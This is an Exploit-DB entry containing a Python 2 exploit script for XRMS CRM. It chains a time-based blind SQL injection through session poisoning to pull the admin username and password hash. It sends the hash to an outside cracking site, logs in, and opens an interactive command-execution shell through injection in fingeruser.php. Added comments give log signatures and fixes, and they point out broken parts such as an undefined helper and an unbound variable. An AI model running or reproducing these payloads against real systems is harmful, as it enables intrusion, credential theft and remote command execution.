
XRms - Blind SQL Injection / Command Execution

🗓️ 28 Aug 2014 00:00:00 · Reported by Benjamin Harris · Type:
exploitdb

XRMS Blind SQL Injection / Command Execution

Code
#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################

import urllib
import urllib2
import time
import sys

# Alphabet the timing oracle below iterates over, and its ASCII codes kept in a
# parallel list (userascii[f] == ord(usercharac[f]) for every index f).
# It covers lowercase letters, '@', '.', '_', '-' and the digits; a character
# outside this set can never be recovered by username()/password(), and the
# search loops there have no exit for that case.
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
	"""Print the tool's ASCII-art banner.

	Python 2 ``print`` statement; the leading tabs inside the literal are
	part of the output.
	"""
	print """	    ____                                      
	   / __/_  ______ _  _  ___________ ___  _____
	  / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
	 / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
	/_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
	             /_/                              
	[+] fuq th3 w0rld, fuq ur m0m!\n"""

def usage():
	"""Print the usage text and terminate the process via the builtin quit().

	Called from the module-level code when no target argument is given;
	nothing after the call runs.
	"""
	print "	[+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
	print "	[+] Example:"
	print "	[+] python " + sys.argv[0] + " domain.to/xrms"
	quit()

def sendhashaway(hash):
	"""Submit an MD5 hash to icrackhash.com and return the plaintext it reports.

	The hash is sent over plain HTTP as a query-string parameter (and echoed
	again in the Referer header), so it leaves the operator's host in the
	clear to a third party -- an outbound connection to www.icrackhash.com
	is the observable side effect of this step.

	The parameter name ``hash`` shadows the builtin of the same name.
	The result is cut out of the response with getpositions(), which is not
	defined anywhere in this file.
	"""
	print " [+] Sending hash to icrackhash.com to be cracked."
	data = None  # no request body -> plain GET
	headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
	url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
	gh = urllib2.Request(url,data,headers)
	gh2 = urllib2.urlopen(gh)
	output = gh2.read()
	# NOTE(review): getpositions is not defined in this file; presumably it
	# returns the text between the two delimiters -- unresolved as written.
	plaintext = getpositions(output,'<td><small><strong>','</strong>')
	print " [-] Plaintext of hash: " +plaintext + "\n"
	return plaintext

def username(length):
	"""Recover the ``username`` column of ``users`` one character at a time.

	Time-based blind SQL injection.  For each position 1..length and each
	candidate in userascii the payload is POSTed as ``user_id`` to
	/plugins/webform/new-form.php (per the header comment, the value is
	kept in the PHP session), then /plugins/useradmin/fingeruser.php is
	requested with that same session id presented under the ``XRMS`` cookie
	name.  A response slower than one second is taken to mean the MySQL
	BENCHMARK() branch ran, i.e. the candidate matched.

	Reads the module-level ``domain``.  Returns the recovered characters as
	a list (the caller joins them).

	Defender notes: every probe carries ``UNION ALL SELECT ... BENCHMARK(``
	literally in the POST body, and the oracle shows up in access logs as a
	burst of HEAD requests to fingeruser.php with a few multi-second
	outliers -- both are cheap log/WAF signatures.  On the application side
	the fix is to stop interpolating the session-stored user_id into SQL
	(parameterized query).
	"""
	length = length + 1  # range() excludes its end, so this covers positions 1..length
	duser = []
	#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
	found = 0
	i = 1  # overwritten by the for loop below
	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
	payload2 = ",1)=CHAR("
	payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
		found = 0
		# No exit other than a match: if no candidate trips the delay
		# (character outside usercharac, or the 1 s threshold misjudged)
		# the whole alphabet is re-run forever.
		while(found != 1):
			for f in range(0,len(userascii)):
				# Both helper classes are re-created on every iteration.
				# The handler hands 300/302 responses back unchanged instead
				# of following them, so prepare.info() still holds the
				# headers (incl. Set-Cookie) of the first hop.
				class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
					def http_error_302(self, req, fp, code, msg, headers):
						infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
						infourl.status = code
						infourl.code = code
						return infourl
					http_error_300 = http_error_302    
				# Despite the name, this forces the request method to POST.
				class HeadRequest(urllib2.Request):
					def get_method(self):
						return "POST"
				payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
				data = urllib.urlencode([('user_id',payload)])
				url = 'http://'+domain+'/plugins/webform/new-form.php'
				opener = urllib2.build_opener(LeHTTPRedirectHandler)
				req = HeadRequest(url,data)
				prepare = opener.open(req)
				# Pull the PHPSESSID line out of the response headers.  The -9
				# trims the tail of that line (presumably a '; path=/' style
				# attribute -- TODO confirm against a real response).
				cookie1 = prepare.info()
				cookie2pos1 = str(cookie1).find('PHPSESSID')
				cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
				line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
				# Same session id, re-labelled as the XRMS cookie
				# (len('PHPSESSID') == 9).
				line = 'XRMS' + line[9:]
				url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
				headers = { 'Cookie' : line }
				data = None
				start = time.time()
				get = urllib2.Request(url,data,headers)
				get.get_method = lambda: 'HEAD'  # only the latency is used, not the body
				try:
					execute = urllib2.urlopen(get)
				except:
					# Bare except: any exception (timeout, HTTP error, reset)
					# is dropped, yet its elapsed time still feeds the oracle,
					# so a slow failure reads as a match.
					pass
				elapsed = (time.time() - start)
				# No break after a hit: the remaining candidates are still
				# probed, and a second slow response appends a second
				# character for the same position.
				if(elapsed > 1):
					print "	Character found. Character is: " + usercharac[f]
					duser.append(usercharac[f])
					found = 1
	return duser

def getusernamelength():
	"""Find the length of ``username`` in ``users`` with the same timing oracle.

	Tries lengths 1, 2, 3, ... until one probe takes longer than a second
	and returns that length as an int.  Same probe mechanics as username()
	and password() (POST to new-form.php, HEAD to fingeruser.php under the
	XRMS cookie), but with a BENCHMARK count ten times larger (50000000).
	Reads the module-level ``domain``.  Never returns if no length trips
	the delay -- the loop has no upper bound.

	Defender notes: same log signature as username() -- ``BENCHMARK(`` in
	the POST body and latency outliers on fingeruser.php.
	"""
	found = 0
	i = 1
	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
	payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
	while (found != 1): 
		# Re-created on every iteration.  Returns 300/302 responses as-is so
		# the first hop's Set-Cookie header is visible on prepare.info().
		class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
			def http_error_302(self, req, fp, code, msg, headers):
				infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
				infourl.status = code
				infourl.code = code
				return infourl
			http_error_300 = http_error_302    
		# Despite the name, forces the method to POST.
		class HeadRequest(urllib2.Request):
			def get_method(self):
				return "POST"
		payload = payload1 + str(i) + payload2
		data = urllib.urlencode([('user_id',payload)])
		url = 'http://'+domain+'/plugins/webform/new-form.php'
		opener = urllib2.build_opener(LeHTTPRedirectHandler)
		req = HeadRequest(url,data)
		prepare = opener.open(req)
		# Extract the PHPSESSID header line; the -9 trims its tail
		# (presumably a '; path=/' style attribute -- TODO confirm).
		cookie1 = prepare.info()
		cookie2pos1 = str(cookie1).find('PHPSESSID')
		cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
		line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
		line = 'XRMS' + line[9:]  # same id under the XRMS cookie name (len('PHPSESSID') == 9)
		url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
		headers = { 'Cookie' : line }
		data = None
		start = time.time()
		get = urllib2.Request(url,data,headers)
		get.get_method = lambda: 'HEAD'  # only the latency is used
		try:
			execute = urllib2.urlopen(get)
		except:
			# Bare except: errors are dropped but their elapsed time still
			# counts, so a slow failure reads as a match.
			pass
		elapsed = (time.time() - start)
		if(elapsed > 1):
			print "	Length found at position: " + str(i)
			found = 1
			length = i
			return length
		i = i + 1

def password(length):
	"""Recover the ``password`` column of ``users`` one character at a time.

	Identical to username() except for the column probed; the caller passes
	32, the length of an MD5 hex digest, and the usercharac alphabet does
	contain the hex characters.  Reads the module-level ``domain``.
	Returns the recovered characters as a list.

	Defender notes: same log signature as username() (``BENCHMARK(`` in
	the POST body, latency outliers on fingeruser.php); the application-side
	fix is a parameterized query for the session-stored user_id.
	"""
	length = length + 1  # range() excludes its end, so positions 1..length are covered
	dpassword = []
	#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
	found = 0
	i = 1  # overwritten by the for loop below
	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
	payload2 = ",1)=CHAR("
	payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
		found = 0
		# No exit other than a match: a character outside usercharac makes
		# this loop re-run the alphabet forever.
		while(found != 1):
			for f in range(0,len(userascii)):
				# Re-created every iteration.  Returns 300/302 as-is so the
				# first hop's Set-Cookie header stays visible on prepare.info().
				class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
					def http_error_302(self, req, fp, code, msg, headers):
						infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
						infourl.status = code
						infourl.code = code
						return infourl
					http_error_300 = http_error_302    
				# Despite the name, forces the method to POST.
				class HeadRequest(urllib2.Request):
					def get_method(self):
						return "POST"
				payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
				data = urllib.urlencode([('user_id',payload)])
				url = 'http://'+domain+'/plugins/webform/new-form.php'
				opener = urllib2.build_opener(LeHTTPRedirectHandler)
				req = HeadRequest(url,data)
				prepare = opener.open(req)
				# Extract the PHPSESSID header line; the -9 trims its tail
				# (presumably a '; path=/' style attribute -- TODO confirm).
				cookie1 = prepare.info()
				cookie2pos1 = str(cookie1).find('PHPSESSID')
				cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
				line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
				line = 'XRMS' + line[9:]  # same id under the XRMS cookie name (len('PHPSESSID') == 9)
				url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
				headers = { 'Cookie' : line }
				data = None
				start = time.time()
				get = urllib2.Request(url,data,headers)
				get.get_method = lambda: 'HEAD'  # only the latency is used
				try:
					execute = urllib2.urlopen(get)
				except:
					# Bare except: errors are dropped but their elapsed time
					# still counts, so a slow failure reads as a match.
					pass
				elapsed = (time.time() - start)
				# No break after a hit: the remaining candidates are still
				# probed and a second slow response appends a second character.
				if(elapsed > 1):
					print "	Character found. Character is: " + usercharac[f]
					dpassword.append(usercharac[f])
					found = 1
	return dpassword

def login(domain,user,password):
	"""POST the credentials to /login-2.php under a fixed, client-chosen XRMS cookie.

	The same cookie value is reused by commandexec(), so the login state is
	expected to attach to this client-supplied session id (presumably the
	application accepts arbitrary ids -- not verified here).  Prints
	"Logged In" when the response body contains 'PEAR.php', presumably a
	path disclosed on the post-login page -- TODO confirm.  Returns None and
	does not report failure.

	Defender notes: a session cookie that the server never issued is a
	strong anomaly if session ids are tracked server-side.
	"""
	cookie = "XRMS=iseeurgettinown4d"
	url = 'http://'+domain+'/login-2.php'
	headers = { 'Cookie' : cookie }
	data = urllib.urlencode([('username',user),('password',password)])
	a1 = urllib2.Request(url,data,headers)
	a2 = urllib2.urlopen(a1)
	output = a2.read()
	if output.find('PEAR.php') > 0:
		print "	[+] Logged In"

def commandexec(domain,command):
	"""Pass ``command`` through the fingeruser.php ``username`` parameter and return its output.

	The command is wrapped as ``; echo '0x41';<command>;echo '14x0';`` so the
	output can be cut out of the page between the two markers.  Sends the
	same fixed XRMS cookie that login() used.

	Defender notes: shell metacharacters (``;``) and the echo markers in the
	``username`` query string of fingeruser.php are a direct signature; the
	application-side fix is to never hand that parameter to a shell.
	"""
	cookie = "XRMS=iseeurgettinown4d"
	# urlencode() of a (key, None) pair yields "<quoted key>=None": the whole
	# wrapped command travels as the parameter *name*, with a literal "=None"
	# tail after the closing ';' (presumably inert -- TODO confirm).
	cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
	headers = { 'Cookie' : cookie }
	data = None  # GET
	url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
	b1 = urllib2.Request(url,data,headers)
	# NOTE(review): a1 is not bound anywhere in this function.
	b2 = urllib2.urlopen(a1)
	output = b2.read()
	# +4 skips past the opening marker; -4 drops the four characters that
	# precede the closing one.
	first = output.find('0x41') + 4
	last = output.find('14x0') - 4
	return output[first:last]

# ---- entry point: module-level code, runs on import as well ----
banner()
if len(sys.argv) < 2:
	usage()  # prints help and calls quit(); nothing below runs
# host[/path] without a scheme; read as a global by the probe functions.
domain = sys.argv[1]
print "	[+] Grabbing username length"
length = getusernamelength()
print "	[+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "	[+] Grabbing password hash"
tmppass =  password(32)  # 32 = length of an MD5 hex digest
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "	[+] Admin password hash: " + admpass
plain = sendhashaway(admpass)  # hash leaves the host to a third-party service
login(domain,adminusr,plain)
# 'quit' is the site builtin here until the assignment below rebinds it as a
# module global, so the first comparison is always true; 'quit' typed at the
# prompt ends the loop.
while(quit != 1):
	cmd = raw_input('	[+] Run a command: ')
	if cmd == 'quit':
		print "	[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print "	[+] "+ commandexec(domain,cmd)
